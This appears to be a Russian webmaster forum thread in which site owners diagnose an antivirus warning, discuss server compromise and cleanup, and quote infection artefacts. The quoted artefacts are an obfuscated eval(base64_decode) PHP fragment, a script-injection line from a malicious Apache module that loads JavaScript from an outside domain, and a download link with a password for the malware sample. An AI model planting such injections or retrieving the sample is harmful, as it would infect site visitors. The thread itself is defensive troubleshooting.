Вирус на сайте-вердикт "Поведенческий анализ"

1 23
dendav
На сайте с 18.03.2010
Offline
51
#21
fotka:


#RewriteCond %{REQUEST_URI} /[0-9a-z_\-]+(/|\.html?|\.php)?$
#RewriteCond %{REQUEST_URI} !^/(css|files|img|js)/

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^(.*)$ index.php?url=$1 [QSA,L]

в этом коде ни чего нет - опасного?

Это .htaccess у вас такой? Тут всё нормально.

fotka:

---------- Добавлено 30.07.2013 в 12:24 ----------

Вот что интересное нашел! Это нормальный код или???

eval(base64_decode('Pz48P3BocAppZihmdW...

Это "или". Удаляйте и ищите шелл.

В моём случае на сайте шелла не было, редирект прописывался на уровне сервера (кто-то взломал сервер). Хостер проблему не признал, но после переезда на другой сервер всё наладилось.

F
На сайте с 29.07.2013
Offline
1
#22

Удалил еще вчера!

Но вот что самое интересное єта зараза на другие сайті лезет и цепляет! Хостер говорит что у них все нормально. Хотя я подозреваю что дело все таки на сервере!

dendav:
Это .htaccess у вас такой? Тут всё нормально.


Это "или". Удаляйте и ищите шелл.

В моём случае на сайте шелла не было, редирект прописывался на уровне сервера (кто-то взломал сервер). Хостер проблему не признал, но после переезда на другой сервер всё наладилось.
M
На сайте с 24.10.2011
Offline
173
#23

на виртуалке у fotka был загружен модуль апача mod_chart_version.so, который изредка вставлял после первого </script> свой блок типа такого

//--></script><script>document.write("<sc"+"ript src='http://mnokih.ru/query.js' ></scr"+"ipt>");</script><!--/LiveInternet-->

что-то из семейства chapro

https://www.virustotal.com/ru/file/69ba698593e183cf42c6d26944630040b0c914f20844010f9ddf965f32cb0826/analysis/

файлик с паролем CocUnJat6 лежит по адресу http://zalil.ru/34653952

sidorka
На сайте с 17.08.2012
Offline
211
#24

----------------deleted-------------------

Дешевые домены для дорвеев и не только - от 55р (https://goo.gl/Wtnwqp)
1TIT1
На сайте с 27.06.2010
Offline
71
#25

а у меня ругается на рекламу партнёрки promo-reklama.ру , не знаю как и лечить

вот на этот код:

<div align="center"><script type="text/javascript" charset="windows-1251" src="http://prre.ru/bout.php?id=........&type=1"></script></div>

[Удален]
#26

1TIT1, ну а что там лечить, удаляем партнерку и едем дальше.

1TIT1
На сайте с 27.06.2010
Offline
71
#27
WapGraf:
1TIT1, ну а что там лечить, удаляем партнерку и едем дальше.

Так они уверяют что они белые и пушистые, что не у кого больше такой проблемы нет, они мне даже привели примеры сайтов где стоит их партнёрка, и действительно sucuri не чего не нашёл .

1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий